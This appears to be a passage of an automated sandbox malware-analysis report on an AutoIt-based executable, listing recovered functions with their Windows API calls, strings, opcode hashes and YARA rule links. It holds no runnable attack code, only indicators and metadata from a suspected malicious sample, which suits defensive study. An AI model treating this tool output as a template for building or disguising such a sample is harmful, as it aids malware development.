Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 0c2b5521f3840cb9d1f2c96fc1c4eb62fd6c9b6ca64278e6dc412d33f007468a
Instruction ID: 03ee854a56c51e5d36c434c29359699acc0cef8c833e9e7c6d88054241a730d3
Opcode Fuzzy Hash: 0c2b5521f3840cb9d1f2c96fc1c4eb62fd6c9b6ca64278e6dc412d33f007468a
Instruction Fuzzy Hash: 8C515175A00219AFCB10DFE5DC84DDEBBBDFF48304F108559EA45A7101DB35AA45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FE3044, Relevance: 16.6, APIs: 11, Instructions: 122COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00FE3058
__swprintf.LIBCMT ref: 00FE306A
__wcsicoll.LIBCMT ref: 00FE3077
FindResourceW.KERNEL32(?,?,0000000E), ref: 00FE308A
LoadResource.KERNEL32(?,00000000), ref: 00FE30A2
LockResource.KERNEL32(00000000), ref: 00FE30AF
FindResourceW.KERNEL32(?,?,00000003), ref: 00FE30DC
LoadResource.KERNEL32(?,00000000), ref: 00FE30EA
SizeofResource.KERNEL32(?,00000000), ref: 00FE30F9
LockResource.KERNEL32(?), ref: 00FE3105

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
String ID:
API String ID: 1158019794-0
Opcode ID: e458873ab22cfb47d8c2b6cd2ce1e84d12392f58c245724a1602b30d32e450bf
Instruction ID: fa77890f49ffc4f017d18283c8a5fb1eaafe124a2dfede50354596c472318b80
Opcode Fuzzy Hash: e458873ab22cfb47d8c2b6cd2ce1e84d12392f58c245724a1602b30d32e450bf
Instruction Fuzzy Hash: 17410472A002556BC720DF61EC89FAB77ADEB85310F00805AFD41DB249E77ADA51D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 01004262, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000001,?,?,?,?,00000000,?,?,?,?), ref: 0100433B
GetProcAddress.KERNEL32(?,AU3_FreeVar), ref: 01004354
_malloc.LIBCMT ref: 01004392
_strlen.LIBCMT ref: 010043F0
_malloc.LIBCMT ref: 010043FA
_strcat.LIBCMT ref: 0100440B
_free.LIBCMT ref: 01004550
_free.LIBCMT ref: 01004562

Strings

AU3_FreeVar, xrefs: 0100434E

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc_free_malloc$_strcat_strlen
String ID: AU3_FreeVar
API String ID: 2634073740-771828931
Opcode ID: 994709b27a29247caab383703e6cee1ccc97307b5237e69c169cc7f0a3646709
Instruction ID: 6fc457a57e17994cc2a68246f4da79e24ff5fc39b77a818e2fee63b270b61c30
Opcode Fuzzy Hash: 994709b27a29247caab383703e6cee1ccc97307b5237e69c169cc7f0a3646709
Instruction Fuzzy Hash: F3B1AEB4A00206DFDB00DF58C881AAAB7F5FF89314F14C1A9EA558B392DB35E951CF90

Uniqueness

Uniqueness Score: -1.00%

Function 010210AB, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON

Download Yara Rule

APIs

Part of subcall function 01006308: GetCursorPos.USER32(?), ref: 0100631D
Part of subcall function 01006308: ScreenToClient.USER32(?,?), ref: 0100633A
Part of subcall function 01006308: GetAsyncKeyState.USER32 ref: 01006377
Part of subcall function 01006308: GetAsyncKeyState.USER32 ref: 01006387

DefDlgProcW.USER32(?,00000205,?,?), ref: 010210FF
ImageList_DragLeave.COMCTL32(00000000), ref: 0102111D
ImageList_EndDrag.COMCTL32 ref: 01021123
ReleaseCapture.USER32 ref: 01021129
SetWindowTextW.USER32 ref: 010211C0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 010211D0

Strings

@GUI_DROPID, xrefs: 010211FF
@GUI_DRAGFILE, xrefs: 01021234

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 2483343779-2107944366
Opcode ID: 62a20e10676f3710b703a5f382082995ea8c979e638dcec08ae243dbf4a876ba
Instruction ID: 8e212c0939de5c15c65c49f1a566bcfce2a6e86826df2f49bd1f3dcf8b8a47b0
Opcode Fuzzy Hash: 62a20e10676f3710b703a5f382082995ea8c979e638dcec08ae243dbf4a876ba
Instruction Fuzzy Hash: 555123712043119FE714EF19CC85FAB77A9FF89350F004A19F9819B2D2DB389949CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01000566, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01000616
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0100062A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0100064B
_wcslen.LIBCMT ref: 01000696
_wcscat.LIBCMT ref: 010006A9
SendMessageW.USER32(?,00001057,00000000,?), ref: 010006C2
SendMessageW.USER32(?,00001061,?,?), ref: 010006F4

Strings

-----, xrefs: 010006A1
SysListView32, xrefs: 010005E9

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window_wcscat_wcslen
String ID: -----$SysListView32
API String ID: 4008455318-3975388722
Opcode ID: 4447307b95d4cdc129ed36c8e64993e70d95081b7883ff57f826d22e51174231
Instruction ID: 8e0d9f73a4038e03d557984a0f2ef6484ce157440c715369828af011c42485cc
Opcode Fuzzy Hash: 4447307b95d4cdc129ed36c8e64993e70d95081b7883ff57f826d22e51174231
Instruction Fuzzy Hash: D6519670500308ABEB25CF65CC49FEB77A9AF8C344F104559F984A72C5D7B99984CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00FF807C, Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FF8101
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FF8104
GetWindowLongW.USER32(?,000000F0), ref: 00FF8128
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FF814B
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FF81BF
SendMessageW.USER32(?,00001074,?,00000007), ref: 00FF820D
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00FF8228
SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 00FF824A
SendMessageW.USER32(?,0000101E,00000001,?), ref: 00FF8261
SendMessageW.USER32(?,00001008,?,00000007), ref: 00FF8279

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 6956d837a057948d9c7eee751263ce5531459e9b0a3744b4b84a0751f7f31d81
Instruction ID: 52176b15f30fe957d831b4e868e5422c08255d73498aebbd59bf573786e55ca6
Opcode Fuzzy Hash: 6956d837a057948d9c7eee751263ce5531459e9b0a3744b4b84a0751f7f31d81
Instruction Fuzzy Hash: 63619174A00208AFDB10DF95CC85FEE77B8FF49310F108159FA54AB291DBB5AA46DB60

Uniqueness

Uniqueness Score: -1.00%

Function 010184CB, Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON

Download Yara Rule

Strings

INSTANCE, xrefs: 0101876B
REGEXPCLASS, xrefs: 010185D7
NAME, xrefs: 01018663
TEXT, xrefs: 0101879E
CLASS, xrefs: 0101857D
CLASSNN, xrefs: 010185AA

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 0-1603158881
Opcode ID: ed7d3f84a8e39f4cda7cd925a10aa58bfd59c4643150f615504a893e153512c7
Instruction ID: 9c1375c0b854d89d18baf27cba87787707ac7c054c7be1b4450441d342498862
Opcode Fuzzy Hash: ed7d3f84a8e39f4cda7cd925a10aa58bfd59c4643150f615504a893e153512c7
Instruction Fuzzy Hash: 25A19172C002049ADF50DF54DC82BEA7778AF44304F04C47AEE996F15AEB79A609DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE401B, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,010590E8,?,00000100,?,C:\Users\user\33920049\fmkkelc.omp), ref: 00FE403E
LoadStringW.USER32(00000000), ref: 00FE4047
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FE405C
LoadStringW.USER32(00000000), ref: 00FE405F
_wprintf.LIBCMT ref: 00FE4088
MessageBoxW.USER32 ref: 00FE40A0

Strings

C:\Users\user\33920049\fmkkelc.omp, xrefs: 00FE4027
%s (%d) : ==> %s: %s %s, xrefs: 00FE4083

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\33920049\fmkkelc.omp
API String ID: 3648134473-843401323
Opcode ID: 87fe7019ba2d01cac5d469dcdf2ceb2ce68a8a093c6b1d41b6fea414ec2cf0cd
Instruction ID: b567af7cdd075e187a6d3403a2706c6fc9190875dddc871f2e7c4047aa195c7e
Opcode Fuzzy Hash: 87fe7019ba2d01cac5d469dcdf2ceb2ce68a8a093c6b1d41b6fea414ec2cf0cd
Instruction Fuzzy Hash: 000167B6A543187AEB20E6959D07FF6372CD7C4B11F004189BB48AB0849AF46E848BB1

Uniqueness

Uniqueness Score: -1.00%

Function 01006151, Relevance: 13.7, APIs: 9, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adc0ee13652ee94829eb8d0d2f2240bdc7b584998a785a26fd8046598f99b992
Instruction ID: 87550417cfb35d65a7e89b04240e165fa42a5d2fbedd9456d9e29dfaf9a6ed02
Opcode Fuzzy Hash: adc0ee13652ee94829eb8d0d2f2240bdc7b584998a785a26fd8046598f99b992
Instruction Fuzzy Hash: FF518E70600705ABEB21CF69DC81FAB77E9BF48710F108619FA85DB2C1D776E8648B60

Uniqueness

Uniqueness Score: -1.00%

Function 00FF10EC, Relevance: 13.6, APIs: 9, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8697259a57ff18c18a45204a24d6aec0b8a0e371e090f70818c098193a90cc11
Instruction ID: bc308b6e11fefe598244498cb66a89fff07dd86767770d73d540bfb5c3300629
Opcode Fuzzy Hash: 8697259a57ff18c18a45204a24d6aec0b8a0e371e090f70818c098193a90cc11
Instruction Fuzzy Hash: 4341D4322542449AE3319A6DB8C4BF6BB9CFFAA335F14441BF2C5C5590C3AA7485E721

Uniqueness

Uniqueness Score: -1.00%

Function 00FFF029, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00FFF249
_memmove.LIBCMT ref: 00FFF2B8
_memmove.LIBCMT ref: 00FFF32C

Strings

\, xrefs: 00FFCFD7
', xrefs: 00FFF198
h, xrefs: 00FFF704

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$_memcmp
String ID: '$\$h
API String ID: 2205784470-1303700344
Opcode ID: abcb502fed9e2b26b76d0fcf5ed0d21d73d738c3186d17adad89b9f134d2acfd
Instruction ID: 380a5818f7246148d693c3727d4f7c510d8705a9f46dabbf1c210eb32646d0c9
Opcode Fuzzy Hash: abcb502fed9e2b26b76d0fcf5ed0d21d73d738c3186d17adad89b9f134d2acfd
Instruction Fuzzy Hash: A1E19E71E002498FCB18CF68C990ABEBBF2FF89314F24866ED95697790D730A945DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9400, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(01057F04), ref: 00FDC5DF
InterlockedDecrement.KERNEL32(01057F04), ref: 00FDC5FD
Sleep.KERNEL32(0000000A), ref: 00FDC605
InterlockedIncrement.KERNEL32(01057F04), ref: 00FDC610
InterlockedDecrement.KERNEL32(01057F04), ref: 00FDC6C2

Strings

@COM_EVENTOBJ, xrefs: 00FDC6F7, 00FDC98E

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$DecrementIncrement$Sleep
String ID: @COM_EVENTOBJ
API String ID: 327565842-2228938565
Opcode ID: 0a2524b0933520c767f0fee718e673ed9328c63f18a94eebeade9f7acdcf639c
Instruction ID: fa6221bfcd0442eb94cd621533dc40d2184cde30f0e9b21e1aa6f755bd3dcb4f
Opcode Fuzzy Hash: 0a2524b0933520c767f0fee718e673ed9328c63f18a94eebeade9f7acdcf639c
Instruction Fuzzy Hash: 30D1CD71D0020A8BDB10EF94C885BEEB7B5FF44314F24855AE445AB382CB79AD46EF90

Uniqueness

Uniqueness Score: -1.00%

Function 01020216, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 010202D5
VariantClear.OLEAUT32(?), ref: 01020409
VariantInit.OLEAUT32(?), ref: 0102045D
DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 010204BE
VariantClear.OLEAUT32(?), ref: 010204D0

Part of subcall function 00FE548F: VariantCopy.OLEAUT32(?,?), ref: 00FE54A0

VariantCopy.OLEAUT32(?,?), ref: 01020534

Part of subcall function 00FE5411: VariantClear.OLEAUT32(?), ref: 00FE5422

VariantClear.OLEAUT32(00000000), ref: 010205C7

Strings

H, xrefs: 010202B0

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$Clear$Copy$CallDispFuncInit
String ID: H
API String ID: 3613100350-2852464175
Opcode ID: 94383ce4f367f10f0caddd691d6e74a6eceeb6482a5c19394dd0814e17d075df
Instruction ID: 04750ee0c9daedc8ad1d3022f14900376a42447f52c2ec11e95c9b2c4029baed
Opcode Fuzzy Hash: 94383ce4f367f10f0caddd691d6e74a6eceeb6482a5c19394dd0814e17d075df
Instruction Fuzzy Hash: BDB17BB5604361AFE760CF58C884A2FB7E5FF88304F148A2DFAD597245D634E851CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FE52D0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

SafeArrayAccessData.OLEAUT32(?,?), ref: 00FE52F4
VariantClear.OLEAUT32(?), ref: 00FE532E
SafeArrayUnaccessData.OLEAUT32(?), ref: 00FE534E
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FE5381
VariantClear.OLEAUT32(?), ref: 00FE53C1
SafeArrayUnaccessData.OLEAUT32(?), ref: 00FE5404

Strings

crts, xrefs: 00FE5305

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
String ID: crts
API String ID: 586820018-3724388283
Opcode ID: bef9aa71fce2a821937a43dcd1bdf1b5894943ec8fdb175a8a9eec2f6885f204
Instruction ID: d1e6585923fdc648aac08550a2bec42a36978b5d57c2eb3ad51a1a19f509277f
Opcode Fuzzy Hash: bef9aa71fce2a821937a43dcd1bdf1b5894943ec8fdb175a8a9eec2f6885f204
Instruction Fuzzy Hash: C0415FB5600608DFDB20CF19D484A9AB7BAFF9C314B24C11AEE49CB355D735E951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FFB415, Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00FFB433

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00FFB466
EnterCriticalSection.KERNEL32(?), ref: 00FFB483
_memmove.LIBCMT ref: 00FFB4E1
_memmove.LIBCMT ref: 00FFB504
LeaveCriticalSection.KERNEL32(?), ref: 00FFB513
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00FFB52F
InterlockedExchange.KERNEL32(?,000001F6), ref: 00FFB544

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
String ID:
API String ID: 2737351978-0
Opcode ID: bc5c77ac1270b389e064e1a5f34afeb385d6006fb3f5a6d5a28d86eea1dfd61e
Instruction ID: 2c611dceef1de8eba4429f5a0ab4a0f99a985c91361b53636014f0bdf9847804
Opcode Fuzzy Hash: bc5c77ac1270b389e064e1a5f34afeb385d6006fb3f5a6d5a28d86eea1dfd61e
Instruction Fuzzy Hash: 1241BA71A00309EBDB20DF94DD41EABB7B8FF48700F10892DFA9696640D778EA44EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC5134, Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 00FC515A
__calloc_crt.LIBCMT ref: 00FC5166
__getptd.LIBCMT ref: 00FC5173
CreateThread.KERNEL32(00000000,?,00FC50DB,00000000,00000004,00000000), ref: 00FC519A
ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00FC51AA
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00FC51B5
_free.LIBCMT ref: 00FC51BE
__dosmaperr.LIBCMT ref: 00FC51C9

Part of subcall function 00FC7E9A: __getptd_noexit.LIBCMT ref: 00FC7E9A

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 3638380555-0
Opcode ID: f0049a42ec1bb930763e1dfa8e3fbd97fb0f44ff550e3f96ac79a55f3a459af9
Instruction ID: b6272b5ffb513b0af25bcb828dd1b1d16ef81a92c7bcf51de3096f2f7ccffe89
Opcode Fuzzy Hash: f0049a42ec1bb930763e1dfa8e3fbd97fb0f44ff550e3f96ac79a55f3a459af9
Instruction Fuzzy Hash: ED115933505B036BC3213BB55D4BF5B3758EF81B30F24020DF514862C2DBB9A840AA60

Uniqueness

Uniqueness Score: -1.00%

Function 010150C6, Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 01015196

Part of subcall function 0100875F: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D204E858,00000000,00000000,00000000,00000000,?,?,?,01016CC2,?,01023B72,01023B72,?), ref: 0100877B

inet_addr.WSOCK32(?,00000000,?,?), ref: 010151D8
gethostbyname.WSOCK32(?), ref: 010151E3
GlobalAlloc.KERNEL32(00000040,00000040), ref: 01015259
_memmove.LIBCMT ref: 01015307
GlobalFree.KERNEL32(00000000), ref: 01015399
WSACleanup.WSOCK32 ref: 0101539F

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
String ID:
API String ID: 2945290962-0
